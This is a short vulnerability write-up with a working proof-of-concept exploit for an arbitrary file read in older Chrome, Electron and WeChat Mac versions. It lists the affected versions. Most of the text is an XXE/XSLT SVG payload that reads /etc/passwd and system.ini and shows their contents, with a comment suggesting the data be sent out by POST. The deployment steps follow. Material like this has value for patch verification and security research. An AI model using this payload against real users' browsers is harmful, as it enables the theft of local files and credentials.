Google Chrome Arbitrary File Reading
Vulnerability Principle: The first entity declaration that references an external entity is intercepted. By including itself as an external XML document and then making a second entity declaration that references an external entity, and requiring the formats of the two references to be compatible without error, interception can be bypassed and local files can be read.
Exploitation Conditions:
Chrome version < 116.0.5845.96
Electrom version < 26.1.0
WeChat Mac version < 3.8.5.17
Prerequisite: Disable sandbox mode
Reproduction Environment
Payload
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!DOCTYPE div [
<!ENTITY passwd_p "file:///etc/passwd">
<!ENTITY passwd_c SYSTEM "file:///etc/passwd">
<!ENTITY sysini_p "file:///c:/windows/system.ini">
<!ENTITY sysini_c SYSTEM "file:///c:/windows/system.ini">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('')"/>
<body xmlns="http://www.w3.org/1999/xhtml">
<div style="display:none">
<p class="&passwd_p;">&passwd_c;</p>
<p class="&sysini_p;">&sysini_c;</p>
</div>
<div style="width:40rem" id="r" />
<script>
document.querySelector('#r').innerHTML = `
remote web url: <textarea style="width:100%;height:1rem">${location.href}</textarea><br/><br/>`;
document.querySelectorAll('p').forEach(p => {
//You can send p.innerHTML by POST.
document.querySelector('#r').innerHTML += `
local file path: <textarea style="width:100%;height:1rem">${ p.className }</textarea><br/>
local file content:<textarea style="width:100%;height:6rem">${ p.innerHTML }</textarea><br/><br/>`;
});
</script>
</body>
</xsl:template>
</xsl:stylesheet>
The attacking machine opens the Apache service and renames the payload as d.svg. The browser accesses the page.
systemctl start apache2
Successfully read the local system.ini file. Through this vulnerability, other sensitive files in Windows can be read, and XXE code can be executed.
